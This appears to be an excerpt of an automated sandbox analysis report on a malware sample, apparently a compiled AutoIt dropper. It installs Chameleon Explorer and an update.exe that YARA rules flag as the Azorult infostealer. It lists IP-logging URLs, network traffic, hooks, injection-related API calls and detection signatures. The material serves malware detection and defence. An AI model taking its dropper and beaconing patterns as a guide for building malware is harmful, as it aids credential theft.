                    Source: cexplorer.exe, 00000001.00000003.1720546422.0000000002370000.00000004.00001000.00020000.00000000.sdmp, cexplorer.exe, 00000001.00000003.1945646507.00000000020F6000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1723437714.0000000003200000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1936284190.0000000002294000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.dk-soft.org/
                    Source: cexplorer.exe, 00000001.00000003.1721375497.000000007FD20000.00000004.00001000.00020000.00000000.sdmp, cexplorer.exe, 00000001.00000003.1721149790.00000000024B0000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000000.1721951365.0000000000401000.00000020.00000001.01000000.00000006.sdmp, cexplorer.tmp.1.drString found in binary or memory: http://www.innosetup.com/
                    Source: cexplorer.exe, 00000001.00000000.1719947136.0000000000401000.00000020.00000001.01000000.00000005.sdmp, cexplorer.exe.0.drString found in binary or memory: http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
                    Source: ETVk1yP43q.exe, 00000000.00000003.1756339774.0000000004937000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000002.1796035751.0000000004937000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1756018602.0000000004917000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.myexternalip.com/raw
                    Source: cexplorer.exe, 00000001.00000003.1720546422.0000000002370000.00000004.00001000.00020000.00000000.sdmp, cexplorer.exe, 00000001.00000003.1945646507.00000000020F6000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1723437714.0000000003200000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1936284190.0000000002294000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.palkornel.hu/innosetup%1
                    Source: cexplorer.exe, 00000001.00000003.1721375497.000000007FD20000.00000004.00001000.00020000.00000000.sdmp, cexplorer.exe, 00000001.00000003.1721149790.00000000024B0000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000000.1721951365.0000000000401000.00000020.00000001.01000000.00000006.sdmp, cexplorer.tmp.1.drString found in binary or memory: http://www.remobjects.com/ps
                    Source: cexplorer.exe, 00000001.00000003.1721375497.000000007FE32000.00000004.00001000.00020000.00000000.sdmp, cexplorer.exe, 00000001.00000003.1721149790.00000000025C6000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000002.1942069076.000000000018E000.00000004.00000010.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005F79000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005E3A000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005A60000.00000004.00001000.00020000.00000000.sdmp, ChameleonFolder.exe, 00000009.00000003.1860258055.0000000000C76000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000A.00000003.1892493052.00000000039C1000.00000004.00000020.00020000.00000000.sdmp, ChameleonFolder.exe, 0000000B.00000003.1895117695.0000000000BE1000.00000004.00000020.00020000.00000000.sdmp, cexplorer.exe.0.dr, cexplorer.tmp.1.dr, is-JAVSO.tmp.2.drString found in binary or memory: http://www.startssl.com/0Q
                    Source: cexplorer.exe, 00000001.00000003.1721375497.000000007FE32000.00000004.00001000.00020000.00000000.sdmp, cexplorer.exe, 00000001.00000003.1721149790.00000000025C6000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000002.1942069076.000000000018E000.00000004.00000010.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005F79000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005E3A000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005A60000.00000004.00001000.00020000.00000000.sdmp, ChameleonFolder.exe, 00000009.00000003.1860258055.0000000000C76000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000A.00000003.1892493052.00000000039C1000.00000004.00000020.00020000.00000000.sdmp, ChameleonFolder.exe, 0000000B.00000003.1895117695.0000000000BE1000.00000004.00000020.00020000.00000000.sdmp, cexplorer.exe.0.dr, cexplorer.tmp.1.dr, is-JAVSO.tmp.2.drString found in binary or memory: http://www.startssl.com/policy0
                    Source: ETVk1yP43q.exe, 00000000.00000003.1777701833.0000000004BDE000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000002.1796709623.0000000004BDE000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1778470634.0000000004BDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://2no.co/
                    Source: ETVk1yP43q.exe, 00000000.00000003.1778521848.0000000004B88000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1782873840.0000000004B9B000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1777701833.0000000004B84000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000002.1796862019.0000000004BFF000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1755851564.0000000004C6A000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000002.1796686615.0000000004BA2000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1776975922.0000000004C6A000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1783603372.0000000004BA2000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1777057613.0000000004C98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://2no.co/1dHC37
                    Source: ETVk1yP43q.exe, 00000000.00000003.1782637071.0000000004AB9000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1755737499.0000000004AB2000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1783160385.0000000004AB9000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000002.1796392614.0000000004AB9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://2no.co/1dHC37B
                    Source: ETVk1yP43q.exe, 00000000.00000003.1755851564.0000000004C6A000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1776975922.0000000004C6A000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1777057613.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000002.1797114581.0000000004C9A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://2no.co/redirect-
                    Source: ETVk1yP43q.exe, 00000000.00000003.1777701833.0000000004B84000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1778548734.0000000004B85000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000002.1796667122.0000000004B85000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://2no.co:443/1dHC37Users
                    Source: ETVk1yP43q.exe, 00000000.00000003.1782637071.0000000004AB9000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1755737499.0000000004AB2000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1783160385.0000000004AB9000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000002.1796392614.0000000004AB9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
                    Source: ETVk1yP43q.exe, 00000000.00000003.1755851564.0000000004C6A000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1776975922.0000000004C6A000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1777057613.0000000004C98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.iplogger.org/favicon.ico
                    Source: ETVk1yP43q.exe, 00000000.00000003.1755851564.0000000004C6A000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1776975922.0000000004C6A000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1777057613.0000000004C98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.iplogger.org/redirect/logo-dark.png);background-position:center;background-repeat:no-rep
                    Source: ETVk1yP43q.exe, 00000000.00000003.1776975922.0000000004C59000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1778424639.0000000004C59000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000002.1797004863.0000000004C59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.iplogger.org/redirect/logo-dark.png);background-position:center;z
                    Source: ETVk1yP43q.exe, 00000000.00000002.1796862019.0000000004BFF000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1776975922.0000000004C59000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1755851564.0000000004C6A000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1776975922.0000000004C6A000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1778424639.0000000004C59000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000002.1797004863.0000000004C59000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1777057613.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000002.1797114581.0000000004C9A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://counter.yadro.ru/hit?
                    Source: cexplorer.tmp, 00000002.00000002.1942069076.000000000018E000.00000004.00000010.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005F79000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005E3A000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005A60000.00000004.00001000.00020000.00000000.sdmp, ChameleonFolder.exe, 00000009.00000003.1860258055.0000000000C76000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000A.00000002.1912013674.0000000000148000.00000004.00000010.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000A.00000003.1892493052.00000000039C1000.00000004.00000020.00020000.00000000.sdmp, ChameleonFolder.exe, 0000000B.00000003.1895117695.0000000000BE1000.00000004.00000020.00020000.00000000.sdmp, is-JAVSO.tmp.2.drString found in binary or memory: https://d.symcb.com/cps0%
                    Source: cexplorer.tmp, 00000002.00000002.1942069076.000000000018E000.00000004.00000010.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005F79000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005E3A000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005A60000.00000004.00001000.00020000.00000000.sdmp, ChameleonFolder.exe, 00000009.00000003.1860258055.0000000000C76000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000A.00000002.1912013674.0000000000148000.00000004.00000010.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000A.00000003.1892493052.00000000039C1000.00000004.00000020.00020000.00000000.sdmp, ChameleonFolder.exe, 0000000B.00000003.1895117695.0000000000BE1000.00000004.00000020.00020000.00000000.sdmp, is-JAVSO.tmp.2.drString found in binary or memory: https://d.symcb.com/rpa0
                    Source: cexplorer.tmp, 00000002.00000002.1942069076.000000000018E000.00000004.00000010.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005F79000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005E3A000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005A60000.00000004.00001000.00020000.00000000.sdmp, ChameleonFolder.exe, 00000009.00000003.1860258055.0000000000C76000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000A.00000003.1892493052.00000000039C1000.00000004.00000020.00020000.00000000.sdmp, ChameleonFolder.exe, 0000000B.00000003.1895117695.0000000000BE1000.00000004.00000020.00020000.00000000.sdmp, is-JAVSO.tmp.2.drString found in binary or memory: https://d.symcb.com/rpa0.
                    Source: update.exe, update.exe, 00000015.00000002.2485021748.00000000029D6000.00000040.00001000.00020000.00000000.sdmp, update.exe, 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmpString found in binary or memory: https://dotbit.me/a/
                    Source: ETVk1yP43q.exe, 00000000.00000002.1796862019.0000000004BFF000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1776975922.0000000004C59000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1755851564.0000000004C6A000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1776975922.0000000004C6A000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1778424639.0000000004C59000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000002.1797004863.0000000004C59000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1777057613.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000002.1797114581.0000000004C9A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://iplogger.org/
                    Source: ETVk1yP43q.exe, 00000000.00000002.1796862019.0000000004BFF000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1776975922.0000000004C59000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1755851564.0000000004C6A000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1776975922.0000000004C6A000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1778424639.0000000004C59000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000002.1797004863.0000000004C59000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1777057613.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000002.1797114581.0000000004C9A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://iplogger.org/privacy/
                    Source: ETVk1yP43q.exe, 00000000.00000002.1796862019.0000000004BFF000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1776975922.0000000004C59000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1755851564.0000000004C6A000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1776975922.0000000004C6A000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1778424639.0000000004C59000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000002.1797004863.0000000004C59000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000003.1777057613.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, ETVk1yP43q.exe, 00000000.00000002.1797114581.0000000004C9A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://iplogger.org/rules/
                    Source: ChameleonExplorer.exe, 00000004.00000002.1831169359.00000000014C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://neosoft-activator.appspot.com/
                    Source: ChameleonExplorer.exe, 00000004.00000002.1831169359.00000000014C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://neosoft-activator.appspot.com/activation/4/?h_id=75254DF3C66AB052045780D3C643713C-1B3D82FF20
                    Source: ChameleonExplorer.exe, 00000004.00000002.1831169359.00000000014C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://neosoft-activator.appspot.com/vB
                    Source: cexplorer.exe, 00000001.00000003.1721375497.000000007FE32000.00000004.00001000.00020000.00000000.sdmp, cexplorer.exe, 00000001.00000003.1721149790.00000000025C6000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000002.1942069076.000000000018E000.00000004.00000010.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005F79000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005E3A000.00000004.00001000.00020000.00000000.sdmp, cexplorer.tmp, 00000002.00000003.1918775425.0000000005A60000.00000004.00001000.00020000.00000000.sdmp, ChameleonFolder.exe, 00000009.00000003.1860258055.0000000000C76000.00000004.00000020.00020000.00000000.sdmp, ChameleonExplorer.exe, 0000000A.00000003.1892493052.00000000039C1000.00000004.00000020.00020000.00000000.sdmp, ChameleonFolder.exe, 0000000B.00000003.1895117695.0000000000BE1000.00000004.00000020.00020000.00000000.sdmp, cexplorer.exe.0.dr, cexplorer.tmp.1.dr, is-JAVSO.tmp.2.drString found in binary or memory: https://www.startssl.com/policy0
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                    Source: unknownHTTPS traffic detected: 104.21.79.229:443 -> 192.168.2.4:49730 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 172.217.16.212:443 -> 192.168.2.4:49732 version: TLS 1.2
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeWindows user hook set: 0 mouse C:\Program Files (x86)\Chameleon Explorer\Folder.dllJump to behavior
                    Source: cexplorer.tmp, 00000002.00000003.1918775425.0000000005A60000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: RegisterRawInputDevices error!Umemstr_16402902-0

                    System Summary

                    barindex
                    Source: 21.2.update.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
                    Source: 21.2.update.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Azorult Payload Author: kevoreilly
                    Source: 21.2.update.exe.29d6000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
                    Source: 21.2.update.exe.29d6000.1.unpack, type: UNPACKEDPEMatched rule: Azorult Payload Author: kevoreilly
                    Source: 21.2.update.exe.29d6000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
                    Source: 21.2.update.exe.29d6000.1.raw.unpack, type: UNPACKEDPEMatched rule: Azorult Payload Author: kevoreilly
                    Source: 00000015.00000002.2485021748.00000000029D6000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
                    Source: 00000015.00000002.2485021748.00000000029D6000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Azorult Payload Author: kevoreilly
                    Source: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
                    Source: 00000003.00000002.2181002868.0000000003226000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
                    Source: ETVk1yP43q.exe, 00000000.00000000.1666434300.0000000000495000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_aa0ec4ec-f
                    Source: ETVk1yP43q.exe, 00000000.00000000.1666434300.0000000000495000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_5177280e-e
                    Source: ETVk1yP43q.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_05d245f8-9
                    Source: ETVk1yP43q.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_43cc7580-e
                    Source: C:\Users\user\AppData\Roaming\update.exeCode function: 3_2_007A141B NtSetContextThread,3_2_007A141B
                    Source: C:\Users\user\AppData\Roaming\update.exeCode function: 3_2_007A1162 NtProtectVirtualMemory,3_2_007A1162
                    Source: C:\Users\user\AppData\Roaming\update.exeCode function: 3_2_007A1448 NtResumeThread,Sleep,3_2_007A1448
                    Source: C:\Users\user\AppData\Roaming\update.exeCode function: 21_2_00601162 NtProtectVirtualMemory,21_2_00601162
                    Source: C:\Users\user\AppData\Local\Temp\is-7BGNI.tmp\cexplorer.tmpCode function: 2_2_03577F102_2_03577F10
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeCode function: 11_2_03477F1011_2_03477F10
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeCode function: 15_2_0333ECDB15_2_0333ECDB
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeCode function: 15_2_0326968015_2_03269680
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeCode function: 15_2_0327E6D015_2_0327E6D0
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeCode function: 15_2_0333C00115_2_0333C001
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeCode function: 16_2_02977F1016_2_02977F10
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeCode function: 17_2_029F7F1017_2_029F7F10
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeCode function: 18_2_029C7F1018_2_029C7F10
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeCode function: 19_2_02A97F1019_2_02A97F10
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeCode function: 20_2_0332FD1020_2_0332FD10
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exeCode function: 20_2_0334236020_2_03342360
                    Source: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exeCode function: 22_2_02A37F1022_2_02A37F10
                    Source: Joe Sandbox ViewDropped File: C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe (copy) 9A9923C08D3FC5937B6ED189E20CF416482A079BC0C898C4ED75329E0EE3AE89
                    Source: Joe Sandbox ViewDropped File: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe (copy) 137723BDD388F6E5A50B7942EFF02F4CC70E6B86D8650A41F9E8956EA1E4DE3B
                    Source: Joe Sandbox ViewDropped File: C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder64.exe (copy) 3F6880605A97FFB9B14CD97419A40CB2EA6CEFD616E417FE538031D633FB93B9
                    Source: C:\Users\user\AppData\Roaming\update.exeCode function: String function: 00403BF4 appears 46 times
                    Source: C:\Users\user\AppData\Roaming\update.exeCode function: String function: 00401358 appears 32 times
                    Source: C:\Users\user\AppData\Roaming\update.exeCode function: String function: 004062FC appears 42 times
                    Source: C:\Users\user\AppData\Roaming\update.exeCode function: String function: 00404E98 appears 86 times
                    Source: C:\Users\user\AppData\Roaming\update.exeCode function: String function: 0040300C appears 32 times
                    Source: C:\Users\user\AppData\Roaming\update.exeCode function: String function: 00404EC0 appears 33 times
                    Source: C:\Users\user\AppData\Roaming\update.exeCode function: String function: 004034E4 appears 32 times
                    Source: cexplorer.tmp.1.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                    Source: cexplorer.tmp.1.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                    Source: is-OJNBS.tmp.2.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                    Source: is-OJNBS.tmp.2.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                    Source: is-KSQ9G.tmp.2.drStatic PE information: Number of sections : 11 > 10
                    Source: is-29AV0.tmp.2.drStatic PE information: Number of sections : 11 > 10
                    Source: is-SCGGO.tmp.2.drStatic PE information: Number of sections : 11 > 10
                    Source: ETVk1yP43q.exe, 00000000.00000003.1782637071.0000000004AB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FV_ORIGINALFILENAME6XiQN vs ETVk1yP43q.exe
                    Source: ETVk1yP43q.exe, 00000000.00000003.1772720667.0000000001983000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs ETVk1yP43q.exe
                    Source: ETVk1yP43q.exe, 00000000.00000003.1772720667.0000000001983000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FV_ORIGINALFILENAME vs ETVk1yP43q.exe
                    Source: ETVk1yP43q.exe, 00000000.00000003.1769018382.0000000003D14000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ents|CompanyName|FileDescription|FileVersion|InternalName|LegalCopyright|LegalTrademarks|OriginalFilename|ProductName|ProductVersion|PrivateBuild|SpecialBuild++O$ vs ETVk1yP43q.exe
                    Source: ETVk1yP43q.exe, 00000000.00000003.1769018382.0000000003D14000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ents|CompanyName|FileDescription|FileVersion|InternalName|LegalCopyright|LegalTrademarks|OriginalFilename|ProductName|ProductVersion|PrivateBuild|SpecialBuild vs ETVk1yP43q.exe
                    Source: ETVk1yP43q.exe, 00000000.00000003.1755737499.0000000004AB2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FV_ORIGINALFILENAME6XiQN vs ETVk1yP43q.exe
                    Source: ETVk1yP43q.exe, 00000000.00000003.1783160385.0000000004AB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FV_ORIGINALFILENAME6XiQN vs ETVk1yP43q.exe
                    Source: ETVk1yP43q.exe, 00000000.00000002.1796392614.0000000004AB9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FV_ORIGINALFILENAME6XiQN vs ETVk1yP43q.exe
                    Source: ETVk1yP43q.exe, 00000000.00000003.1777619102.000000000198A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs ETVk1yP43q.exe
                    Source: ETVk1yP43q.exe, 00000000.00000003.1777619102.000000000198A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FV_ORIGINALFILENAME vs ETVk1yP43q.exe
                    Source: ETVk1yP43q.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                    Source: 21.2.update.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
                    Source: 21.2.update.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
                    Source: 21.2.update.exe.29d6000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
                    Source: 21.2.update.exe.29d6000.1.unpack, type: UNPACKEDPEMatched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
